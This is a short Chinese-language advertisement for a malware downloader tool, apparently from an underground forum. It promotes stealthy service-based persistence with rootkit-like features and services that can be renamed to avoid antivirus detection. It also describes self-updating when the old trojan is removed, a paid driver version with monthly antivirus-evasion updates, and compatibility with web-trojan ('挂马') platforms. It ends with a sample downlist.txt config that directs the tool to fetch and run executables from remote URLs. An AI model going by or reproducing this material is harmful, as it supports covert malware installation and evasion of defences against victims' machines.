|
看够了市面上的所谓感染下载者,除了鸡肋就是很暴力~
下载者首先做好他本职工作稳定,隐藏。
本下载者利用插服务启动方式,实现rootkit决大部分功能
为了使用者方便,服务端裸壳,可自定义服务名,便于及时改名躲避查杀。
带升级替换服务功能,如老马被杀,可定义TXT进行升级替换。
服务端无其他插件,单个EXE文件,便于内存,特征免杀。
商业版为驱动过主动版,功能同上,按月免杀sys驱动文件。
此版兼容市面上的流量统计平台以及挂马插件平台,自定义TXT文件即可。
[本下载者可以配置信息更新版本和杜绝重复下载] 1.第一行表示查询时间,单位分钟 2.第二行表示下载者版本(6位,年月日),与更新路径。如果本地 版本小于服务器上版本则会根据后面地址更新自己。 3.第三行以后表示下载下载文件路径,第二列推广ID(6位,不足补 0),第三列下载文件版本(2位,不足补0),第四列下载文件路径 4.最多可以有10条下载信息
5.示例:downlist.txt文件内容
time|3 date|070301|http://192.168.0.116/down.exe down|000001|03|http://192.168.0.101/AspSerSet.exe down|000002|03|http://192.168.0.101/2.exe down|000003|01|http://192.168.0.101/4.exe
|